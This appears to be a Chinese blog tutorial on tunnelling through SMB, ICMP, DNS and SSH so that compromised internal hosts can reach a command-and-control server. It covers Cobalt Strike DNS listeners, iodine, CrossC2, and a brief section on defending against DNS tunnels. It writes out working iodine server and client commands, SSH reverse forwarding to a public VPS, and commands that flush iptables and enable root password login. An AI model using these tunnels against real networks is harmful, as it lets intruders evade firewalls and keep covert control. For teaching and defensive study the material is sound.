【内网安全】隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac

本文涉及的产品
全局流量管理 GTM,标准版 1个月
云解析DNS,个人版 1个月
云解析 DNS,旗舰版 1个月
简介: 【内网安全】隧道技术&SSH&DNS&ICMP&SMB&上线通讯Linux&Mac

CS不支持linux主机上线

这里禁用了所有tcp端口,依旧可以ping通,以及dns解析成功


SMB隧道&通讯&上线

判断:445通讯

通过端口扫描是否开放445端口进行判断

上线:借助通讯后绑定上线 详见往期文章

通讯:直接SMB协议通讯即可


ICMP隧道&通讯&上线

判断:ping命令

能ping通说明可以使用icmp隧道

上线:见往期文章

通讯:其他项目(icmpsh icmptunnel)

https://github.com/esrrhs/spp

https://github.com/bdamele/icmpsh

https://github.com/esrrhs/pingtunnel


DNS隧道&通讯&上线

判断:windows:nslookup linux:dig


1、上线环境:内网主机只出网DNS协议数据,解决上线

-域名申请及配置

-监听器创建及配置


-后门绑定监听器及生成

image.png

CS建立DNS隧道上线

mode dns-txt

sleep 0

2、通讯环境:

有些鸡肋

内网主机只出网DNS协议数据,解决通讯

判断出网:nslookup www.baidu.com

项目工具:https://github.com/yarrick/iodine

iodine/ˈaɪədaɪn/单词的意思就是碘 原子序数为 53,53 也是 DNS 服务对应的端口号

安装

yum install iodine   #centos
apt-get intall iodine #ubuntu


-服务器:设置密码xiaodi并创建虚拟IP及绑定域名指向 这里演示linux服务端,windows服务端下载地址 https://code.kryo.se/iodine/


iodined -f -c -P whgojp 192.168.0.1 ns1.whgojp.top -DD


sudo iodined -f -c -P whgojp 192.168.0.1 ns1.whgojp.top -DD

-f 在前台运行

-c 不检查传入请求的客户端 IP 地址

-P 客户端与服务端之间的连接密码

-D 调试级别,-D 表示第一级,-DD 表示第二级,依此类推

192.168.0.1 是自己自定义的局域网虚拟 IP 地址。


设置密码whgojp并创建虚拟IP及绑定域名指向

-客户端:连接密码whgojp并绑定域名指向

windows 演示

iodine -f -M 200 -P whgojp ns1.whgojp.top

70990b0cdd6a77f57eb133b366a14b6f_d6a721e71cb642f1a3c8e739a81fe8b8.png

直接执行会报错,windows客户端可以直接使用编译好的windows版本,同时需要安装TAP网卡驱动程序。也可以下载OpenVPN,安装时只选择TAP Virtual Ethernet Adapter,安装后服务器上就会多出一块“TAP-Wndows ADApter V9”的网卡

1c9b0b772f59a8acf9956bc8761ee803_7bfee7d91faa455dba6c6e412d5682cd.png


都能在对方电脑上安装程序了,还要这样大费周折

双方都新增了一个网卡(dns、TAP-9),从而建立了通道

ping不通是因为靶机上有防火墙

image.png

windows平台iodine建立DNS隧道连接


linux演示

未开防火墙

-尝试通讯尝试连接:

ssh kali@192.168.0.2

这里我尝试ssh连接,但是立即命令中断,可能是DNS配置问题


SSH隧道&通讯

判断:ssh连接

1、上线:

由于CS无SSH协议监听器配置,无法上线

2、通讯:

由于SSH协议存在于Linux系统,跳板机必须Linux


iptables -F /* 清除所有规则 /

iptables -A INPUT -p tcp --dport 22 -j ACCEPT /允许包从22端口进入/

iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /允许从22端口进入的包返回/

iptables -A OUTPUT -p udp --dport 53 -j ACCEPT / 域名解析端口,一般不开 /

iptables -A INPUT -p udp --sport 53 -j ACCEPT / 域名解析端口,一般不开 /

iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /允许本机访问本机/

iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT

iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /允许所有IP访问80端口/

iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT

iptables-save > /etc/sysconfig/iptables /保存配置/

iptables -L / 显示iptables列表 */

开启ssh协议登录:

vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

本地:入站封

将本地访问 10.10.10.132的流量转发至公网vps 1234端口上

ssh -CfNg -R 1122:10.10.10.132:8080 root@47.94.130.xx
curl http://127.0.0.1:1122

image.png


SSH隧道流量转发远程vps-信息探针


远程:出站封

将本地访问10.10.10.132的流量转发至本地的1234的端口上

ssh -CfNg -L 1234:10.10.10.132:8080 root@10.10.10.146
curl http://127.0.0.1:1234

同上输入146密码,访问本地(146)1234端口,


防御DNS隧道攻击的方法

禁止网络中任何人向外部服务器发送DNS请求,只允许与受信任的DNS服务器通信。

虽然没有人会将TXT解析请求发送给DNS服务器,但是邮件服务器/网关会这样做,因此,可以将邮件服务器/网关列入白名单并阻止传入和传出流量中的TXT请求。

跟踪用户的DNS查询次数,如果达到阈值,就生成相应的报告


控制上线-插件-Linux&Mac&IOS&Android

项目:https://github.com/gloxec/CrossC2

面向Linux Mac IOS Android系统上线支持

1、插件使用

2、命令使用

使用参考:

https://gloxec.github.io/CrossC2/zh_cn/

1、下载对应版本加载器和CNA插件

2、上传加载器文件和本地加载CNA插件

3、修改CNA插件配置路径及上传Key文件

4、使用命令或插件绑定HTTPS监听器生成


使用CS4.7版本没有搭建成功


待续

03c0b2017f8f044421ee1aeddf947144_6ed3f01306d340d3be00f6f6e14abc98.png


参考:

https://zhuanlan.zhihu.com/p/379021936

https://www.cnblogs.com/micr067/p/12263337.html

相关文章
|
17天前
|
Ubuntu Linux vr&ar
IM跨平台技术学习(十二):万字长文详解QQ Linux端实时音视频背后的跨平台实践
本文详细记录了新版QQ音视频通话在 Linux 平台适配开发过程中的技术方案与实现细节,希望能帮助大家理解在 Linux 平台从 0 到 1 实现音视频通话能力的过程。
36 2
|
10天前
|
传感器 数据采集 安全
工程安全监测中的振弦采集仪技术解析与应用
工程安全监测中的振弦采集仪技术解析与应用
工程安全监测中的振弦采集仪技术解析与应用
|
3天前
|
域名解析 缓存 网络协议
深入理解Linux下的DNS技术
Linux DNS详解:连接用户与网络资源的关键,涉及基本原理、DNS服务器软件如BIND、PowerDNS、Dnsmasq、解析过程、缓存及系统配置。理解这些有助于优化网络性能和安全。配置文件 `/etc/resolv.conf` 用于指定DNS服务器,而DNS缓存提升响应速度。学习DNS技术,提升系统效率与可靠性。
27 7
|
6天前
|
存储 缓存 网络协议
如何在 Linux 上刷新 DNS 缓存?
【7月更文挑战第14天】
9 0
如何在 Linux 上刷新 DNS 缓存?
|
17天前
|
网络协议 安全 Ubuntu
7 个有用的免费 Linux 网络隧道
【7月更文挑战第4天】
58 0
7 个有用的免费 Linux 网络隧道
|
1天前
|
存储 JSON 安全
OAuth2与JWT在API安全中的角色:技术深度解析
【7月更文挑战第20天】OAuth2和JWT作为两种重要的安全协议,在API安全中发挥着不可或缺的作用。OAuth2通过提供灵活的授权框架,实现了对资源的细粒度访问控制;而JWT则通过其紧凑性和自包含性,确保了身份验证和信息传输的安全性。在实际应用中,将OAuth2和JWT结合使用,可以构建出既强大又安全的API服务,为用户提供更加安全、可靠和便捷的数字体验。
|
23天前
|
Unix Shell Linux
技术笔记:linux中SIGHUP与nohup的关系
技术笔记:linux中SIGHUP与nohup的关系
15 1
|
18天前
|
安全 网络安全
安全----DDOS攻击解析,预防DDOS攻击的反击时ip封禁
安全----DDOS攻击解析,预防DDOS攻击的反击时ip封禁
|
18天前
|
网络协议 Linux 分布式数据库
【Linux】DNS系统,ICMP协议,NAPT技术详解
NAPT(Network Address Port Translation),也被称为端口地址转换,是一种NAT(网络地址转换)的形式。NAPT允许多个设备在内部网络上使用私有IP地址,并通过单个公共IP地址与外部网络进行通信。NAPT通过改变传输层的端口号来实现这一点,从而允许多个内部设备共享同一个公共IP地址。
24 0
|
23天前
|
Unix 关系型数据库 Linux
技术笔记:linux学习心得
技术笔记:linux学习心得
14 0